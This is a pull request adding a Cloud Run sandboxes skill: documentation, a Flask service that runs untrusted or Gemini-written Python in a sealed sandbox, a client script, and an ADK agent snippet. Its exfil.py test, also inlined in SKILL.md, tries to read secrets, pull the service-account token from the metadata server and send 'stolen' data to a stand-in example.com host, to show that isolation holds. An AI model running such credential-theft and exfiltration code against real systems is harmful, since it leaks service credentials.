### PR TITLE
e05 Cloud Run sandboxes skill

### DIFF
--- a/cloud-run-sandboxes/README.md
+++ b/cloud-run-sandboxes/README.md
@@ -1,0 +1,17 @@
+# Cloud Run Sandboxes
+
+Run untrusted or model-generated code safely inside a Google Cloud Run service. One deploy flag, `--sandbox-launcher`, turns a container into a host for sealed sandboxes that have no credentials, no metadata server, and no network until you allow it per call.
+
+The installable skill and all verified code live in [skill/](skill/).
+
+- [skill/SKILL.md](skill/SKILL.md), the skill, current facts, quick start, and gotchas inline.
+- [skill/scripts/sandbox_run.py](skill/scripts/sandbox_run.py), point it at a deployed service and run a file or a Gemini-generated task in the sandbox.
+- [skill/scripts/service/](skill/scripts/service/), the deployable Cloud Run service.
+- [skill/scripts/exfil.py](skill/scripts/exfil.py) and [skill/scripts/fetch.py](skill/scripts/fetch.py), the isolation and egress reproductions.
+- [skill/scripts/adk_agent.py](skill/scripts/adk_agent.py), the ADK `CloudRunSandboxCodeExecutor` one-liner.
+
+Install the skill.
+
+```
+npx skills add https://github.com/SaschaHeyer/gen-ai-livestream/tree/main/cloud-run-sandboxes/skill
+```

--- a/cloud-run-sandboxes/skill/SKILL.md
+++ b/cloud-run-sandboxes/skill/SKILL.md
@@ -1,0 +1,160 @@
+---
+name: cloud-run-sandboxes
+description: Use this skill when running untrusted or model-generated code safely on Google Cloud Run, building an AI code interpreter, or letting an agent execute Python it wrote without exposing your service credentials. Covers deploying a Cloud Run service with the sandbox launcher, running code in a sealed sandbox via the sandbox CLI, the deny-by-default network and per-call egress control, credential and metadata isolation, and the ADK CloudRunSandboxCodeExecutor one-liner. Tools and SDKs, gcloud beta run, the /usr/local/gcp/bin/sandbox binary, google-genai, google-adk.
+---
+
+# Cloud Run Sandboxes Skill
+
+## Overview
+
+Cloud Run sandboxes let a service spawn lightweight isolated execution boundaries inside its own instance to run untrusted or model-written code. One deploy flag turns a container into a sandbox host.
+
+- Deploy a service with `--sandbox-launcher`, the `sandbox` binary appears at `/usr/local/gcp/bin/sandbox`.
+- Run any code in a fresh throwaway sandbox with `sandbox do`.
+- The sandbox has no env vars, no metadata server, and no outbound network by default.
+- Open egress per call with `--allow-egress` when you trust the code.
+- With ADK, wire it into an agent as `code_executor=CloudRunSandboxCodeExecutor()`.
+
+> [!IMPORTANT]
+> The enable flag is `--sandbox-launcher` on `gcloud beta run deploy` or `gcloud beta run services update`. Inside the container the tool is `/usr/local/gcp/bin/sandbox`, and `sandbox do -- <cmd>` creates a sandbox, runs the command, and deletes it. This is a `beta` surface, make sure your gcloud is current (see the warning below).
+
+> [!IMPORTANT]
+> The ADK executor import path is `from google.adk.integrations.cloud_run import CloudRunSandboxCodeExecutor`. As of 2026-07-11 it is only on the adk-python `main` branch, install it with `pip install "git+https://github.com/google/adk-python"`. The released `google-adk 2.4.0` does not have it, the announcement says it lands in the next version. Recheck the released version before relying on plain `pip install google-adk`.
+
+> [!WARNING]
+> Cloud Run sandboxes are in public preview under Pre-GA Offerings Terms. Environment compute shares the container CPU and memory with no premium charge during preview, that is a preview condition and can change, and you still pay for the Cloud Run instance. Do not build a production dependency on preview behavior.
+
+> [!WARNING]
+> Sandboxed code execution is not unique to Cloud Run, E2B, Modal, and Vertex AI all offer it, and ADK itself ships `e2b/` and `daytona/` executors. What is specific here is that the sandbox lives inside the Cloud Run instance you already deploy, with no separate sandbox service to run.
+
+---
+
+## Quick Start
+
+### 1. Deploy a service with the sandbox launcher on
+
+```bash
+gcloud beta run deploy sandbox-demo --source . \
+  --region us-central1 \
+  --sandbox-launcher \
+  --allow-unauthenticated \
+  --set-env-vars "GEMINI_API_KEY=$GEMINI_API_KEY"
+```
+
+> [!WARNING]
+> If `--sandbox-launcher` is rejected as an unknown flag, your gcloud beta component is stale, not the feature missing. The flag shipped 2026-07-10. Run `gcloud components update` and retry. Symptom, `gcloud beta run deploy --help` shows no sandbox flag on an older component.
+
+### 2. Run code inside a sandbox from your handler
+
+The whole trick is one subprocess call. `do` means make a fresh box, run this, throw the box away.
+
+```python
+import os, subprocess, sys, tempfile
+
+SANDBOX = "/usr/local/gcp/bin/sandbox"
+PYTHON = os.path.realpath(sys.executable)  # absolute path, see warning
+
+def run_in_sandbox(code, allow_egress=False):
+    with tempfile.NamedTemporaryFile("w", suffix=".py", dir="/tmp", delete=False) as f:
+        f.write(code)
+        path = f.name
+    cmd = [SANDBOX, "do"]
+    if allow_egress:
+        cmd.append("--allow-egress")
+    cmd += ["--", PYTHON, path]
+    proc = subprocess.run(cmd, capture_output=True, text=True, timeout=60)
+    return {"stdout": proc.stdout, "stderr": proc.stderr, "returncode": proc.returncode}
+```
+
+> [!WARNING]
+> The sandbox runs with an EMPTY PATH, the environment is not inherited and PATH is part of that. A bare `python3` (or any binary name) is not found. Symptom, `error finding executable "python3" in PATH []: no such file or directory` and `exit status 128`. Fix, invoke the interpreter by absolute path, `sys.executable` resolves to something like `/usr/local/bin/python3.12`. The same rule applies to any binary, pass a full path or set it with `--env`.
+
+### 3. Prove the isolation, run code that tries to break out
+
+Deterministic reproduction, this exact script was run in a sandbox and every boundary held.
+
+```python
+# exfil.py, run with: python sandbox_run.py --url <service> --file exfil.py
+import os, urllib.request
+def get(url, headers=None):
+    return urllib.request.urlopen(urllib.request.Request(url, headers=headers or {}), timeout=5).read().decode()
+print("GEMINI_API_KEY visible in sandbox:", "GEMINI_API_KEY" in os.environ)
+try:
+    get("http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token",
+        {"Metadata-Flavor": "Google"}); print("TOKEN LEAKED")
+except Exception as e: print("metadata blocked:", type(e).__name__)
+try:
+    get("https://example.com/steal?data=secret"); print("EGRESS OK")
+except Exception as e: print("egress blocked:", type(e).__name__)
+```
+
+Measured output, verified 2026-07-11 against a live service. The service has `GEMINI_API_KEY` in its own env, the sandboxed code cannot see it.
+
+```
+GEMINI_API_KEY visible in sandbox: False
+metadata blocked: URLError
+egress blocked: URLError
+```
+
+### 4. Open egress per call when you trust the code
+
+```bash
+python sandbox_run.py --url <service> --file fetch.py                 # egress OFF -> "fetch blocked: URLError"
+python sandbox_run.py --url <service> --file fetch.py --allow-egress  # egress ON  -> "FETCH OK: <github zen>"
+```
+
+> [!WARNING]
+> With `--allow-egress` the run can print a cosmetic teardown line on stderr, `Error: Failed to cleanup network namespace: failed to unmount netns file ...: no such file or directory`. The `returncode` is still 0 and stdout is correct, it is a preview teardown warning, not a failure.
+
+### 5. The ADK one-liner
+
+```python
+# pip install "git+https://github.com/google/adk-python"   (main only, for now)
+from google.adk.agents import Agent
+from google.adk.integrations.cloud_run import CloudRunSandboxCodeExecutor
+
+analyst_agent = Agent(
+    name="cloud_run_data_analyst",
+    model="gemini-2.5-flash",
+    instruction="You are a data analyst. Write and execute Python to answer questions about your data safely.",
+    code_executor=CloudRunSandboxCodeExecutor(),
+)
+```
+
+## Workflow
+
+For an agent using this skill against a deployed service.
+
+1. Confirm the service URL is a Cloud Run service deployed with `--sandbox-launcher`. If none exists, deploy `scripts/service/` per Quick Start step 1.
+2. To run the user's own code file in the sandbox, `python scripts/sandbox_run.py --url <service> --file <their_file.py>`. Add `--allow-egress` only if the code legitimately needs the network.
+3. To let Gemini write the code for a task and run it, `python scripts/sandbox_run.py --url <service> --generate "<task>"`.
+4. Report the returned `stdout`, `stderr`, and `returncode`. A blocked network or metadata read is expected isolation, not an error, unless `--allow-egress` was set.
+
+## Dependencies and Prerequisites
+
+- A current gcloud, `gcloud components update` if `--sandbox-launcher` is unknown.
+- A Google Cloud project with billing, and the run, cloudbuild, and artifactregistry APIs enabled.
+- The service container, `google-genai == 2.10.0`, `flask == 3.1.0`, `gunicorn == 23.0.0` (pinned in `scripts/service/requirements.txt`). The image must contain any interpreter the sandbox runs, this one uses `python:3.12-slim`.
+- The client utility `scripts/sandbox_run.py` uses only the Python standard library, no install.
+- The ADK executor, `pip install "git+https://github.com/google/adk-python"` until the next release, needs Python 3.10 or newer.
+
+## Supporting files
+
+- [scripts/sandbox_run.py](scripts/sandbox_run.py), the parameterized client, points at any sandbox service and runs a file or a Gemini-generated task. `python scripts/sandbox_run.py --url <service> --file exfil.py`
+- [scripts/service/main.py](scripts/service/main.py), the Flask service that runs code in the sandbox, deploy with `scripts/service/Dockerfile`.
+- [scripts/service/Dockerfile](scripts/service/Dockerfile) and [scripts/service/requirements.txt](scripts/service/requirements.txt), the container definition and pinned deps.
+- [scripts/exfil.py](scripts/exfil.py), the break-out reproduction, proves credential, metadata, and network isolation in one run.
+- [scripts/fetch.py](scripts/fetch.py), the egress toggle reproduction, blocked by default, allowed with `--allow-egress`.
+- [scripts/adk_agent.py](scripts/adk_agent.py), the ADK CloudRunSandboxCodeExecutor one-liner.
+
+## Documentation Pages
+
+You MUST fetch the matching page below before writing code. These hosted docs are the source of truth for parameters, flags, and edge cases, do not rely solely on the examples above.
+
+- https://docs.cloud.google.com/run/docs/code-execution
+- https://docs.cloud.google.com/run/docs/configuring/services/sandboxes
+- https://cloud.google.com/blog/topics/developers-practitioners/google-cloud-run-sandboxes-are-in-public-preview
+
+## From the episode
+
+Built live on the Friday stream, video link to follow.

--- a/cloud-run-sandboxes/skill/requirements.txt
+++ b/cloud-run-sandboxes/skill/requirements.txt
@@ -1,0 +1,5 @@
+# sandbox_run.py (the client utility) uses only the Python standard library, no deps.
+# The service that runs in Cloud Run has its own pinned deps in scripts/service/requirements.txt:
+#   flask==3.1.0
+#   gunicorn==23.0.0
+#   google-genai==2.10.0

--- a/cloud-run-sandboxes/skill/scripts/adk_agent.py
+++ b/cloud-run-sandboxes/skill/scripts/adk_agent.py
@@ -1,0 +1,16 @@
+# The ADK one-liner. Requires ADK from git main until the next PyPI release:
+#   pip install "git+https://github.com/google/adk-python"
+# The import path below is present on adk-python main and instantiates. It is NOT
+# in released google-adk 2.4.0 yet, the announcement says "the next version".
+from google.adk.agents import Agent
+from google.adk.integrations.cloud_run import CloudRunSandboxCodeExecutor
+
+analyst_agent = Agent(
+    name="cloud_run_data_analyst",
+    model="gemini-2.5-flash",
+    instruction=(
+        "You are a data analyst. Write and execute Python to answer questions "
+        "about your data safely."
+    ),
+    code_executor=CloudRunSandboxCodeExecutor(),
+)

--- a/cloud-run-sandboxes/skill/scripts/exfil.py
+++ b/cloud-run-sandboxes/skill/scripts/exfil.py
@@ -1,0 +1,28 @@
+import os
+import urllib.request
+
+
+def get(url, headers=None):
+    req = urllib.request.Request(url, headers=headers or {})
+    return urllib.request.urlopen(req, timeout=5).read().decode()
+
+
+# 0) can the sandboxed code even see the service's secrets in its env?
+print("GEMINI_API_KEY visible in sandbox:", "GEMINI_API_KEY" in os.environ)
+
+# 1) try to steal the service account token off the metadata server
+try:
+    tok = get(
+        "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token",
+        {"Metadata-Flavor": "Google"},
+    )
+    print("TOKEN LEAKED:", tok[:60])
+except Exception as e:
+    print("metadata blocked:", type(e).__name__)
+
+# 2) try to phone the stolen data out to a server we control
+try:
+    get("https://example.com/steal?data=secret")
+    print("EGRESS OK, data left the box")
+except Exception as e:
+    print("egress blocked:", type(e).__name__)

--- a/cloud-run-sandboxes/skill/scripts/fetch.py
+++ b/cloud-run-sandboxes/skill/scripts/fetch.py
@@ -1,0 +1,7 @@
+import urllib.request
+
+try:
+    body = urllib.request.urlopen("https://api.github.com/zen", timeout=8).read().decode()
+    print("FETCH OK:", body)
+except Exception as e:
+    print("fetch blocked:", type(e).__name__)

--- a/cloud-run-sandboxes/skill/scripts/sandbox_run.py
+++ b/cloud-run-sandboxes/skill/scripts/sandbox_run.py
@@ -1,0 +1,49 @@
+#!/usr/bin/env python3
+"""Point this at a Cloud Run service deployed with --sandbox-launcher and run code
+inside a sandbox. Two modes.
+
+  # run a local Python file inside the sandbox
+  python sandbox_run.py --url https://SERVICE.run.app --file exfil.py
+
+  # let Gemini write the code for a task, then run it in the sandbox
+  python sandbox_run.py --url https://SERVICE.run.app --generate "sum these numbers 1 2 3"
+
+Add --allow-egress to permit outbound network for that one run (off by default).
+Standard library only, no dependencies.
+"""
+import argparse
+import json
+import urllib.request
+
+
+def post(url, payload):
+    data = json.dumps(payload).encode()
+    req = urllib.request.Request(
+        url, data=data, headers={"Content-Type": "application/json"}, method="POST"
+    )
+    with urllib.request.urlopen(req, timeout=120) as r:
+        return json.loads(r.read().decode())
+
+
+def main():
+    ap = argparse.ArgumentParser(description="Run code inside a Cloud Run sandbox")
+    ap.add_argument("--url", required=True, help="Service base URL")
+    group = ap.add_mutually_exclusive_group(required=True)
+    group.add_argument("--file", help="Path to a Python file to run in the sandbox")
+    group.add_argument("--generate", metavar="TASK", help="Let Gemini write the code for TASK, then run it")
+    ap.add_argument("--allow-egress", action="store_true", help="Permit outbound network for this run")
+    args = ap.parse_args()
+
+    base = args.url.rstrip("/")
+    if args.file:
+        with open(args.file) as f:
+            code = f.read()
+        out = post(base + "/run", {"code": code, "allow_egress": args.allow_egress})
+    else:
+        out = post(base + "/generate", {"prompt": args.generate, "allow_egress": args.allow_egress})
+
+    print(json.dumps(out, indent=2))
+
+
+if __name__ == "__main__":
+    main()

--- a/cloud-run-sandboxes/skill/scripts/service/Dockerfile
+++ b/cloud-run-sandboxes/skill/scripts/service/Dockerfile
@@ -1,0 +1,13 @@
+FROM python:3.12-slim
+
+# curl is here so a sandboxed script has a real egress tool to try (and get blocked)
+RUN apt-get update && apt-get install -y --no-install-recommends curl \
+    && rm -rf /var/lib/apt/lists/*
+
+WORKDIR /app
+COPY requirements.txt .
+RUN pip install --no-cache-dir -r requirements.txt
+COPY . .
+
+ENV PORT=8080
+CMD ["gunicorn", "-b", ":8080", "main:app", "--timeout", "120", "--workers", "2"]

--- a/cloud-run-sandboxes/skill/scripts/service/main.py
+++ b/cloud-run-sandboxes/skill/scripts/service/main.py
@@ -1,0 +1,75 @@
+import os
+import subprocess
+import sys
+import tempfile
+
+from flask import Flask, request, jsonify
+from google import genai
+
+app = Flask(__name__)
+
+SANDBOX = "/usr/local/gcp/bin/sandbox"
+# The sandbox runs with an EMPTY PATH (env is not inherited), so "python3" is not
+# found. Invoke the interpreter by absolute path.
+PYTHON = os.path.realpath(sys.executable)
+_client = None
+
+
+def client():
+    global _client
+    if _client is None:
+        _client = genai.Client(api_key=os.environ["GEMINI_API_KEY"])
+    return _client
+
+
+def run_in_sandbox(code, allow_egress=False):
+    """Write code to a temp file and run it inside a fresh throwaway sandbox."""
+    with tempfile.NamedTemporaryFile("w", suffix=".py", dir="/tmp", delete=False) as f:
+        f.write(code)
+        path = f.name
+    cmd = [SANDBOX, "do"]
+    if allow_egress:
+        cmd.append("--allow-egress")
+    cmd += ["--", PYTHON, path]
+    proc = subprocess.run(cmd, capture_output=True, text=True, timeout=60)
+    return {"stdout": proc.stdout, "stderr": proc.stderr, "returncode": proc.returncode}
+
+
+@app.get("/")
+def health():
+    return "cloud-run-sandbox-demo ok\n"
+
+
+@app.post("/run")
+def run():
+    """Run a code string the caller hands us, inside the sandbox. Deterministic."""
+    body = request.get_json(force=True)
+    code = body["code"]
+    allow = bool(body.get("allow_egress", False))
+    return jsonify(run_in_sandbox(code, allow))
+
+
+@app.post("/generate")
+def generate():
+    """Let Gemini write the Python for a task, then run it in the sandbox."""
+    body = request.get_json(force=True)
+    prompt = body["prompt"]
+    allow = bool(body.get("allow_egress", False))
+    model = body.get("model", "gemini-2.5-flash")
+
+    resp = client().models.generate_content(
+        model=model,
+        contents=(
+            "Write a short self-contained Python 3 script for this task. "
+            "Output only the code, no markdown fences, no explanation.\n\nTask: " + prompt
+        ),
+    )
+    code = resp.text.strip()
+    if code.startswith("```"):
+        code = code.split("```", 2)[1]
+        if code.startswith("python"):
+            code = code[len("python"):]
+        code = code.strip()
+
+    result = run_in_sandbox(code, allow)
+    return jsonify({"generated_code": code, **result})

--- a/cloud-run-sandboxes/skill/scripts/service/requirements.txt
+++ b/cloud-run-sandboxes/skill/scripts/service/requirements.txt
@@ -1,0 +1,3 @@
+flask==3.1.0
+gunicorn==23.0.0
+google-genai==2.10.0


### PR DESCRIPTION
Companion skill for the Friday e05 episode, running untrusted or model-written code inside a Cloud Run sandbox.

## What is in it
- `cloud-run-sandboxes/skill/SKILL.md`, current-facts callouts, quick start, gotchas inline, follows the repo skill format.
- `scripts/sandbox_run.py`, a parameterized client, points at a deployed service and runs a local file or a Gemini-generated task in the sandbox.
- `scripts/service/`, the deployable Cloud Run service (main.py, Dockerfile, requirements.txt).
- `scripts/exfil.py` and `scripts/fetch.py`, the isolation and egress reproductions.
- `scripts/adk_agent.py`, the ADK CloudRunSandboxCodeExecutor one-liner.

## Verified
Deployed a real service with `--sandbox-launcher` and ran every path live on 2026-07-11.
- Gemini writes Python, the sandbox runs it, real stdout.
- Exfil attempt sealed, GEMINI_API_KEY not visible, metadata blocked, egress blocked, in one run.
- `--allow-egress` flips a blocked fetch to allowed, per call.
- The shipped `sandbox_run.py` was itself verified end to end in all four modes, then the service torn down.

## Honest notes carried into the skill
- Public preview under Pre-GA terms, no premium during preview.
- The sandbox runs with an empty PATH, call the interpreter by absolute path.
- The ADK executor is on adk-python main only, install via git, not in released google-adk 2.4.0 yet.

Merges live during the Friday stream.